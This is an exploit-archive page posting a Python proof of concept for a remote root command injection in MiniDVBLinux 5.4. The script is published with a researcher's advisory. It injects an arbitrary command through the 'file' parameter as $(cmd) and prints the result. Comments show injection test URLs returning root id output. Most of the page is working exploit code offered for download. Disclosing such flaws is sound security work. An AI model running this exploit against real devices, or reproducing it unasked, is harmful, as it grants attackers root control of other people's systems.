MiniDVBLinux 5.4 Remote Root Command Injection

MiniDVBLinux 5.4 Remote Root Command Injection: Posted Oct 17, 2022; Authored by LiquidWorm | Site zeroscience.mk; MiniDVBLinux version 5.4 suffers from an OS command injection vulnerability. This can be exploited to execute arbitrary commands with root privileges.; tags | exploit, arbitrary, root; SHA-256 | e19e04d5e5328c8f948b2f62f7f2a2d8c6c3b2ef2b324f8e880e61bc0db1f5c1; Download | Favorite | View

MiniDVBLinux 5.4 Remote Root Command Injection

#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The application suffers from an OS command injection vulnerability.
# This can be exploited to execute arbitrary commands with root privileges.
#
# Tested on: MiniDVBLinux 5.4
#            BusyBox v1.25.1
#            Architecture: armhf, armhf-rpi2
#            GNU/Linux 4.19.127.203 (armv7l)
#            VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5717
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php
#
#
# 24.09.2022
#

import requests
import re,sys

#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
#test case 004
#http://ip:8008/?site=about&name=blind&file=$(id)
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
#test case 005
#http://ip:8008/?site=about&name=blind&file=`id`
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory

if len(sys.argv) < 3:
  print('MiniDVBLinux 5.4 Command Injection PoC')
  print('Usage: ./mldhd_root2.py [url] [cmd]')
  sys.exit(17)
else:
    url = sys.argv[1]
    cmd = sys.argv[2]

req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))

Top Authors In Last 30 Days

Red Hat 394 files
Ubuntu 83 files
Debian 30 files
Gentoo 21 files
tmrswrr 9 files
R0ckE7 5 files
Ph0s 5 files
Google Security Research 4 files
Rahad Chowdhury 4 files
Chizuru Toyama 3 files

File Archives

Systems

AIX (429)
Apple (2,037)
BSD (375)
CentOS (57)
Cisco (1,926)
Debian (6,910)
Fedora (1,692)
FreeBSD (1,246)
Gentoo (4,379)
HPUX (880)
iOS (363)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (47,809)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (486)
RedHat (14,602)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,122)
UNIX (9,339)
UnixWare (187)
Windows (6,606)
Other

MiniDVBLinux 5.4 Remote Root Command Injection

MiniDVBLinux 5.4 Remote Root Command Injection

File Archive:

November 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MiniDVBLinux 5.4 Remote Root Command Injection

Share This

MiniDVBLinux 5.4 Remote Root Command Injection

File Archive:

November 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems